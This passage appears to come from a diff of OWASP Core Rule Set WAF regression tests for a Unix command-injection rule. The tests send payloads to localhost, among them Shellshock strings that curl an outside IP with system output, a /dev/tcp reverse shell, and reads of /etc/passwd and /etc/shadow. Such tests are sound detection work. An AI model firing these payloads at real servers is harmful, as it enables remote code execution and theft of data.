log_contains: id "932230" - 
- test_title: 932230-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 14 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 15 desc: RCE from 
https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 16 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 
- output: - no_log_contains: id "932230" - - test_title: 932230-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 17 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 18 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 19 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 20 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 21 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 22 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 23 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" + version: HTTP/1.1 + output: + no_log_contains: id 
"932230" + - test_id: 24 desc: RCE in arg and html entity is sent in cookie stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 25 desc: RCE in arg and html entity is sent in cookie stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something - 
method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + Cookie: htmlentitycookie=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 26 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 27 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
method: POST - port: 80 - uri: "/post" - data: "var=`cut crs312``dig 34test`" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=`cut crs312``dig 34test`" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 28 desc: Test RCE with new semantic versions - ;gcc10.1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;gcc10.1<<$d/tcp/51.15.142.164/777" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 37 desc: "55O5COJ5" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 38 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . 
+ version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 39 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-40 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 40 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-41 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 41 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex dddd 
+silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-42 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 42 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-43 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 43 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-44 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id 
"932230" + - test_id: 44 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-45 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 45 desc: "ATFHUJVF" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;gdb -nx -ex \!whoami -ex quit - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-46 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;gdb -nx -ex \!whoami -ex quit + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 46 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cat /path/file.gz - output: - no_log_contains: id "932230" - - test_title: 932230-47 
+ - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cat /path/file.gz + output: + no_log_contains: id "932230" + - test_id: 47 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;environment" - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-48 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;environment" + version: HTTP/1.0 + output: + no_log_contains: id "932230" + - test_id: 48 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;performance" - version: HTTP/1.0 - output: - no_log_contains: id "932230" - - test_title: 932230-49 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: 